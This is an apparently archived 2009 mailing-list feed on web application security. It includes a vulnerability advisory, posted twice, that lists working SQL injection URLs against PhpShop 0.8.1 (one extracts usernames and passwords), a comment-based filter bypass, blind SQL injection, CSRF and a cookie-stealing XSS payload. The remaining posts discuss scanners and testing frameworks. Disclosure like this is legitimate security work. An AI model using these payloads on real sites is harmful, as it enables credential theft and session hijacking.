<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
	<id>tag:old.nabble.com,2006:forum-408</id>
	<title>Nabble - Web App Security</title>
	<updated>2009-12-06T12:46:57Z</updated>
	<link rel="self" type="application/atom+xml" href="http://old.nabble.com/Web-App-Security-f408.xml" />
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Web-App-Security-f408.html" />
	<subtitle type="html">Provides insights on the unique challenges which make web applications notoriously hard to secure. - comments provided by seclists.org</subtitle>
	
<entry>
	<id>tag:old.nabble.com,2006:post-26669650</id>
	<title>PhpShop Multiple Vulnerabilities</title>
	<published>2009-12-06T12:46:57Z</published>
	<updated>2009-12-06T12:46:57Z</updated>
	<author>
		<name>Andrea Fabrizi</name>
	</author>
	<content type="html">**************************************************************
&lt;br&gt;Application: PhpShop
&lt;br&gt;Version affected:  0.8.1
&lt;br&gt;Website: &lt;a href=&quot;http://www.phpshop.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.phpshop.org/&lt;/a&gt;&lt;br&gt;Discovered By: Andrea Fabrizi
&lt;br&gt;Email: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26669650&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;andrea.fabrizi@...&lt;/a&gt;
&lt;br&gt;Web: &lt;a href=&quot;http://www.andreafabrizi.it&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.andreafabrizi.it&lt;/a&gt;&lt;br&gt;Vuln: Multiple Vulnerabilities
&lt;br&gt;**************************************************************
&lt;br&gt;&lt;br&gt;### SQL INJECTION
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=admin/function_list&amp;module_id=111111'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=admin/function_list&amp;module_id=111111'&lt;/a&gt;&lt;br&gt;union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
&lt;br&gt;aaa
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=shop/flypage&amp;product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=shop/flypage&amp;product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5&lt;/a&gt;&lt;br&gt;-- aaa
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=vendor/vendor_form&amp;vendor_id=1'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=vendor/vendor_form&amp;vendor_id=1'&lt;/a&gt;&amp;nbsp;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=admin/module_form&amp;module_id=1'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=admin/module_form&amp;module_id=1'&lt;/a&gt;&amp;nbsp;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=admin/user_form&amp;user_id=7322f75cc7ba16db1799fd8d25dbcde4'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=admin/user_form&amp;user_id=7322f75cc7ba16db1799fd8d25dbcde4'&lt;/a&gt;&lt;br&gt;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=vendor/vendor_category_form&amp;vendor_category_id=6'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=vendor/vendor_category_form&amp;vendor_category_id=6'&lt;/a&gt;&lt;br&gt;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=store/user_form&amp;user_id=c88ce1c0ad365513d6fe085a8aacaebc'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=store/user_form&amp;user_id=c88ce1c0ad365513d6fe085a8aacaebc'&lt;/a&gt;&lt;br&gt;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=store/payment_method_form&amp;payment_method_id=1'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=store/payment_method_form&amp;payment_method_id=1'&lt;/a&gt;&lt;br&gt;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=tax/tax_form&amp;tax_rate_id=2'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=tax/tax_form&amp;tax_rate_id=2'&lt;/a&gt;&amp;nbsp;and '1'='1
&lt;br&gt;...and many others...
&lt;br&gt;&lt;br&gt;The SQL Injection security check can be bypassed replacing spaces with
&lt;br&gt;comments (/**/)
&lt;br&gt;&lt;br&gt;### BLIND SQL INJECTION
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=shop/browse&amp;category=aaa'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=shop/browse&amp;category=aaa'&lt;/a&gt;&amp;nbsp;and 1=1 -- aaa
&lt;br&gt;&lt;br&gt;### CSRF
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=shop/cart&amp;func=cartAdd&amp;product_id=321&amp;&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=shop/cart&amp;func=cartAdd&amp;product_id=321&amp;&lt;/a&gt;&lt;br&gt;...and many others...
&lt;br&gt;&lt;br&gt;### XSS
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=order/order_print&amp;order_id=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=order/order_print&amp;order_id=1&lt;/a&gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;
&lt;br&gt;...and many others...
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now!
&lt;br&gt;&lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/PhpShop-Multiple-Vulnerabilities-tp26669650p26669650.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26664064</id>
	<title>PhpShop Multiple Vulnerabilities</title>
	<published>2009-12-05T10:46:21Z</published>
	<updated>2009-12-05T10:46:21Z</updated>
	<author>
		<name>Andrea Fabrizi</name>
	</author>
	<content type="html">**************************************************************
&lt;br&gt;Application: PhpShop
&lt;br&gt;Version affected:  0.8.1
&lt;br&gt;Website: &lt;a href=&quot;http://www.phpshop.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.phpshop.org/&lt;/a&gt;&lt;br&gt;Discovered By: Andrea Fabrizi
&lt;br&gt;Email: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26664064&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;andrea.fabrizi@...&lt;/a&gt;
&lt;br&gt;Web: &lt;a href=&quot;http://www.andreafabrizi.it&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.andreafabrizi.it&lt;/a&gt;&lt;br&gt;Vuln: Multiple Vulnerabilities
&lt;br&gt;**************************************************************
&lt;br&gt;&lt;br&gt;### SQL INJECTION
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=admin/function_list&amp;module_id=111111'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=admin/function_list&amp;module_id=111111'&lt;/a&gt;&lt;br&gt;union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
&lt;br&gt;aaa
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=shop/flypage&amp;product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=shop/flypage&amp;product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5&lt;/a&gt;&lt;br&gt;-- aaa
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=vendor/vendor_form&amp;vendor_id=1'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=vendor/vendor_form&amp;vendor_id=1'&lt;/a&gt;&amp;nbsp;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=admin/module_form&amp;module_id=1'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=admin/module_form&amp;module_id=1'&lt;/a&gt;&amp;nbsp;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=admin/user_form&amp;user_id=7322f75cc7ba16db1799fd8d25dbcde4'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=admin/user_form&amp;user_id=7322f75cc7ba16db1799fd8d25dbcde4'&lt;/a&gt;&lt;br&gt;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=vendor/vendor_category_form&amp;vendor_category_id=6'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=vendor/vendor_category_form&amp;vendor_category_id=6'&lt;/a&gt;&lt;br&gt;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=store/user_form&amp;user_id=c88ce1c0ad365513d6fe085a8aacaebc'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=store/user_form&amp;user_id=c88ce1c0ad365513d6fe085a8aacaebc'&lt;/a&gt;&lt;br&gt;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=store/payment_method_form&amp;payment_method_id=1'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=store/payment_method_form&amp;payment_method_id=1'&lt;/a&gt;&lt;br&gt;and '1'='1
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=tax/tax_form&amp;tax_rate_id=2'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=tax/tax_form&amp;tax_rate_id=2'&lt;/a&gt;&amp;nbsp;and '1'='1
&lt;br&gt;...and many others...
&lt;br&gt;&lt;br&gt;The SQL Injection security check can be bypassed replacing spaces with
&lt;br&gt;comments (/**/)
&lt;br&gt;&lt;br&gt;### BLIND SQL INJECTION
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=shop/browse&amp;category=aaa'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=shop/browse&amp;category=aaa'&lt;/a&gt;&amp;nbsp;and 1=1 -- aaa
&lt;br&gt;&lt;br&gt;### CSRF
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=shop/cart&amp;func=cartAdd&amp;product_id=321&amp;&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=shop/cart&amp;func=cartAdd&amp;product_id=321&amp;&lt;/a&gt;&lt;br&gt;...and many others...
&lt;br&gt;&lt;br&gt;### XSS
&lt;br&gt;&lt;a href=&quot;http://localhost/phpshop-0.8.1/?page=order/order_print&amp;order_id=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/phpshop-0.8.1/?page=order/order_print&amp;order_id=1&lt;/a&gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;
&lt;br&gt;...and many others...
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now!
&lt;br&gt;&lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/PhpShop-Multiple-Vulnerabilities-tp26664064p26664064.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26589710</id>
	<title>Re: out of box scanner</title>
	<published>2009-11-30T22:22:57Z</published>
	<updated>2009-11-30T22:22:57Z</updated>
	<author>
		<name>Lawrence Pingree</name>
	</author>
	<content type="html">Rapid 7 is better, nothing stored off site.
&lt;br&gt;&lt;br&gt;Best Regards,
&lt;br&gt;&lt;br&gt;Lawrence Pingree
&lt;br&gt;&lt;br&gt;On Nov 30, 2009, at 9:52 PM, Erik Ilves &amp;lt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26589710&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;green.boy@...&lt;/a&gt;&amp;gt; wrote:
&lt;br&gt;&lt;br&gt;Hey John,
&lt;br&gt;&lt;br&gt;I haven't evaluated myself because i love my nessus scanner, but I've heard good things about &lt;a href=&quot;http://www.qualys.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.qualys.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;B r,
&lt;br&gt;&lt;br&gt;Erik
&lt;br&gt;&lt;br&gt;&lt;br&gt;On 25.11.2009 18:15, John Bennett wrote:
&lt;br&gt;I'm currently evaluating some commercial scanners and wanted to get a feel for others experiences with appscan/cenzic/webinspect. &amp;nbsp;Any gotcha's with any of these products and can anybody recommend one over the other?
&lt;br&gt;thanks,
&lt;br&gt;John
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now! &lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now! &lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now! 
&lt;br&gt;&lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/out-of-box-scanner-tp26524937p26589710.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26587185</id>
	<title>Re: out of box scanner</title>
	<published>2009-11-30T21:52:11Z</published>
	<updated>2009-11-30T21:52:11Z</updated>
	<author>
		<name>Green Boy</name>
	</author>
	<content type="html">Hey John,
&lt;br&gt;&lt;br&gt;I haven't evaluated myself because i love my nessus scanner, but I've 
&lt;br&gt;heard good things about &lt;a href=&quot;http://www.qualys.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.qualys.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;B r,
&lt;br&gt;&lt;br&gt;Erik
&lt;br&gt;&lt;br&gt;&lt;br&gt;On 25.11.2009 18:15, John Bennett wrote:
&lt;div class='shrinkable-quote'&gt;&lt;br&gt;&amp;gt; I'm currently evaluating some commercial scanners and wanted to get a 
&lt;br&gt;&amp;gt; feel for others experiences with appscan/cenzic/webinspect. &amp;nbsp;Any 
&lt;br&gt;&amp;gt; gotcha's with any of these products and can anybody recommend one over 
&lt;br&gt;&amp;gt; the other?
&lt;br&gt;&amp;gt; thanks,
&lt;br&gt;&amp;gt; John
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; This list is sponsored by Cenzic
&lt;br&gt;&amp;gt; --------------------------------------
&lt;br&gt;&amp;gt; Let Us Hack You. Before Hackers Do!
&lt;br&gt;&amp;gt; It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;&amp;gt; Request Yours Now! &lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;&amp;gt; --------------------------------------
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now! 
&lt;br&gt;&lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/out-of-box-scanner-tp26524937p26587185.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26566747</id>
	<title>Re: Complex applications security testing framework</title>
	<published>2009-11-29T10:48:30Z</published>
	<updated>2009-11-29T10:48:30Z</updated>
	<author>
		<name>Marat Vyshegorodtsev</name>
	</author>
	<content type="html">Hello, chr1x!
&lt;br&gt;&lt;br&gt;Thank you for your reply.
&lt;br&gt;&lt;br&gt;Sure, SANS Top25 is not a good example, but CWE classification at
&lt;br&gt;least gives us some structure.
&lt;br&gt;&lt;br&gt;Fuzzing is only one method among others (e.g. code review, developers
&lt;br&gt;interviewing, security logic testing, etc.) used in vulnerability
&lt;br&gt;discovery and usually is applied when source code is not available.
&lt;br&gt;How do I have to test, for example, simple FTP server (with source
&lt;br&gt;code available) to provide comprehensive result? Is there, like, any
&lt;br&gt;public &amp;quot;checklist&amp;quot; where I can fill ticks in?
&lt;br&gt;&lt;br&gt;Again, for web applications it's all clear: OWASP Testing Guide, OWASP
&lt;br&gt;Top10, etc.
&lt;br&gt;For some particular applications there are industry standards - e.g.
&lt;br&gt;J2ME app implementing MMA auth in cell phone falls under &amp;quot;MasterCard
&lt;br&gt;Best Practice for MMA applications&amp;quot;. But AFAIK there is no common and
&lt;br&gt;comprehensive framework for application testing.
&lt;br&gt;&lt;br&gt;Maybe I'm missing smth, but ISSAF is all about penetration tests, not
&lt;br&gt;application assessment. It contains only one small section called
&lt;br&gt;&amp;quot;APPLICATION SECURITY EVALUATION CHECKLIST&amp;quot; and I can hardly call it
&lt;br&gt;&amp;quot;comprehensive&amp;quot;. Compare it, for example, with PCI PA-DSS [0].
&lt;br&gt;&lt;br&gt;[0] &lt;a href=&quot;https://www.pcisecuritystandards.org/security_standards/pci_pa_dss.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;https://www.pcisecuritystandards.org/security_standards/pci_pa_dss.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;2009/11/29 chr1x &amp;lt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26566747&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;chr1x@...&lt;/a&gt;&amp;gt;:
&lt;div class='shrinkable-quote'&gt;&lt;br&gt;&amp;gt; -----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;&amp;gt; Hash: SHA1
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Hello Marat,
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Looking around the links that you posted, in this case, talking about
&lt;br&gt;&amp;gt; the SANS Top25, mostly of those are related to Web, at least, the
&lt;br&gt;&amp;gt; concept, for example: CWE-285: Improper Access Control
&lt;br&gt;&amp;gt; (Authorization). I'm not sure exactly what you mean by assessing
&lt;br&gt;&amp;gt; complex apps in a non-scripting language. I figured out that some apps
&lt;br&gt;&amp;gt; that applies to your question it's more focused on RE / Vulnerability
&lt;br&gt;&amp;gt; discovery tasks, like for example an ftp server in which you could
&lt;br&gt;&amp;gt; perform security assessment with Fuzzing apps like TAOF (The Art of
&lt;br&gt;&amp;gt; Fuzzing) which looks for Stack/Heap/String/Integer overflows, at the
&lt;br&gt;&amp;gt; end in this case, you are doing &amp;quot;security&amp;quot; based testing.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; I know that one of the best testing guidelines for non-web apps is the
&lt;br&gt;&amp;gt; ISSAF [www.oissg.org/issaf] which I highly recommend you to take a look.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Hope I cleared your doubt.
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; chr1x  **
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; - --
&lt;br&gt;&amp;gt; - ---
&lt;br&gt;&amp;gt; [CubilFelino Security Research Lab - &lt;a href=&quot;http://chr1x.sectester.net&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://chr1x.sectester.net&lt;/a&gt;&amp;nbsp;]
&lt;br&gt;&amp;gt; &amp;quot;The computer security is an art form. It's the ultimate martial art.&amp;quot;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; Marat VYSHEGORODTSEV escribió:
&lt;br&gt;&amp;gt;&amp;gt; Hello, web security researchers!
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; There is well known methodology for auditing security of web
&lt;br&gt;&amp;gt;&amp;gt; applications called OWASP Testing Guide [0], but it describes testing
&lt;br&gt;&amp;gt;&amp;gt; procedures for only web applications, not for, like, complex
&lt;br&gt;&amp;gt;&amp;gt; applications (for example, containing application servers, application
&lt;br&gt;&amp;gt;&amp;gt; gateways and so on) usually written in C#, C++, Delphi or any other
&lt;br&gt;&amp;gt;&amp;gt; non-scripting language. Would you, folks, recommend such a framework
&lt;br&gt;&amp;gt;&amp;gt; for testing complex not-web-only-applications?
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; I know only one approach from SANS [1] (Top25, CWE classification and
&lt;br&gt;&amp;gt;&amp;gt; risk assessment), but it doesn't provide comprehensive methodology
&lt;br&gt;&amp;gt;&amp;gt; like OWASP does. Basically I want to fill a gap between risk and
&lt;br&gt;&amp;gt;&amp;gt; vulnerability assessment jobs and I'm looking for generally recognized
&lt;br&gt;&amp;gt;&amp;gt; approach.
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; [0] &lt;a href=&quot;http://www.owasp.org/index.php/Category:OWASP_Testing_Project&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.owasp.org/index.php/Category:OWASP_Testing_Project&lt;/a&gt;&lt;br&gt;&amp;gt;&amp;gt; [1] &lt;a href=&quot;http://www.sans.org/top25-programming-errors/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.sans.org/top25-programming-errors/&lt;/a&gt;&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; Sincerely, Marat Vyshegorodtsev
&lt;br&gt;&amp;gt;&amp;gt; Assessment specialist
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt; This list is sponsored by Cenzic
&lt;br&gt;&amp;gt;&amp;gt; --------------------------------------
&lt;br&gt;&amp;gt;&amp;gt; Let Us Hack You. Before Hackers Do!
&lt;br&gt;&amp;gt;&amp;gt; It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;&amp;gt;&amp;gt; Request Yours Now!
&lt;br&gt;&amp;gt;&amp;gt; &lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;&amp;gt;&amp;gt; --------------------------------------
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; -----BEGIN PGP SIGNATURE-----
&lt;br&gt;&amp;gt; Version: GnuPG v1.4.9 (MingW32)
&lt;br&gt;&amp;gt; Comment: Using GnuPG with Mozilla - &lt;a href=&quot;http://enigmail.mozdev.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://enigmail.mozdev.org/&lt;/a&gt;&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt; iQEcBAEBAgAGBQJLEp0IAAoJEENUkd83ZfT49lgH/1TcCdJEzeAjhRcRXrV233gT
&lt;br&gt;&amp;gt; 139XqC5sJw/n4FtVLvxBGtCPO4ZZlo5MHET+fumyVJ6plhHX/H81LTl+XJGh8h+s
&lt;br&gt;&amp;gt; 8bN4lwL9zNGUayG2Rfjveme8Kj8uo3PLfQeyFyIsQKCqckw8oxepNTJKmDgKAJT+
&lt;br&gt;&amp;gt; n2gxprxzGPOX8joW0h9asoXLE1sa9ad5whThukcgRYU8FTMyYoA4q3Nlg02MUNwH
&lt;br&gt;&amp;gt; oEgX2qSamrL4Uo091yztg3ug4NUd4Ox/1YymgvStpn4zB5aZbwbaQNnkBxf/Zcgl
&lt;br&gt;&amp;gt; Po0PdcMYLBj5CTIOsXQ0PO/AWpvKwjpEcW2JYZxhaCsnxcKn6QvSgSCZV17PK3s=
&lt;br&gt;&amp;gt; =lKzV
&lt;br&gt;&amp;gt; -----END PGP SIGNATURE-----
&lt;br&gt;&amp;gt;
&lt;br&gt;&amp;gt;
&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;-- 
&lt;br&gt;Marat Vyshegorodtsev
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;This list is sponsored by Cenzic
&lt;br&gt;--------------------------------------
&lt;br&gt;Let Us Hack You. Before Hackers Do!
&lt;br&gt;It's Finally Here - The Cenzic Website HealthCheck. FREE.
&lt;br&gt;Request Yours Now!
&lt;br&gt;&lt;a href=&quot;http://www.cenzic.com/2009HClaunch_Securityfocus&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cenzic.com/2009HClaunch_Securityfocus&lt;/a&gt;&lt;br&gt;--------------------------------------
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Complex-applications-security-testing-framework-tp26560305p26566747.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26566812</id>
	<title>Re: Complex applications security testing framework</title>
	<published>2009-11-29T08:10:49Z</published>
	<updated>2009-11-29T08:10:49Z</updated>
	<author>
		<name>chr1x</name>
	</author>
